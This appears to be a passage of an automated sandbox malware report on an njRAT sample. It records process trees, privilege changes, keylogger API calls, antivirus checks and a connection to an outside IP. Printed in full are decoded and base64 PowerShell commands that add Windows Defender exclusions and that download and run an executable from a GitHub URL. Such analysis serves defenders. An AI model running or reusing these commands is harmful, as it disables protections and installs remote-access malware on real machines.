Source: powershell.exe, 00000009.00000002.2371660342.000002542A6F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: javaw.exe, 0000000C.00000003.1476564419.00000000148C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: java/lang/VirtualMachineError.classPK
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T
Source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: javaw.exe, 0000000C.00000002.3906245228.0000000000918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\virus.exe.bin.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Network Connect: 46.121.250.34 7777

.NET source code references suspicious native API functions

Source: Payload.exe.11.dr, kl.cs	Reference to suspicious API methods: MapVirtualKey(a, 0u)
Source: Payload.exe.11.dr, kl.cs	Reference to suspicious API methods: GetAsyncKeyState(num2)
Source: Payload.exe.11.dr, OK.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\			Jump to behavior

Encrypted powershell cmdline option found

Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded $url = "https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"$output = "$env:Temp/RuntimeBroker.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded $url = "https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"$output = "$env:Temp/RuntimeBroker.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe"	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\HugeHack.jar"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js" /elevate	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe"
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaacwa6ac8alwbnagkadaboahuaygauagmabwbtac8aqqbuag8abgbbag0amaazadyaoqavageabqavahiayqb3ac8acgblagyacwavaggazqbhagqacwavag0ayqbpag4alwbsahuabgb0agkabqblaeiacgbvagsazqbyac4azqb4aguaiganaaoajabvahuadabwahuadaagad0aiaaiacqazqbuahyaogbuaguabqbwac8augb1ag4adabpag0azqbcahiabwbraguacgauaguaeablaciadqakaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbsacaalqbpahuadabgagkabablacaajabvahuadabwahuadaanaaoauwb0ageacgb0ac0auabyag8aywblahmacwagac0argbpagwazqbqageadaboacaajabvahuadabwahuadaa=
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaacwa6ac8alwbnagkadaboahuaygauagmabwbtac8aqqbuag8abgbbag0amaazadyaoqavageabqavahiayqb3ac8acgblagyacwavaggazqbhagqacwavag0ayqbpag4alwbsahuabgb0agkabqblaeiacgbvagsazqbyac4azqb4aguaiganaaoajabvahuadabwahuadaagad0aiaaiacqazqbuahyaogbuaguabqbwac8augb1ag4adabpag0azqbcahiabwbraguacgauaguaeablaciadqakaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbsacaalqbpahuadabgagkabablacaajabvahuadabwahuadaanaaoauwb0ageacgb0ac0auabyag8aywblahmacwagac0argbpagwazqbqageadaboacaajabvahuadabwahuadaa=	Jump to behavior

Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd+set CDAudio door open/set CDAudio door closed

Contains functionality to query CPU information (cpuid)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 12_2_023203C0 cpuid

12_2_023203C0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\virus.exe.bin.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\6252 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables zone checking for all users

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS

AV process strings found (often used to terminate AV products)

Binary or memory string: Wireshark.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Roaming\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Njrat

Source: Yara match	File source: virus.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE
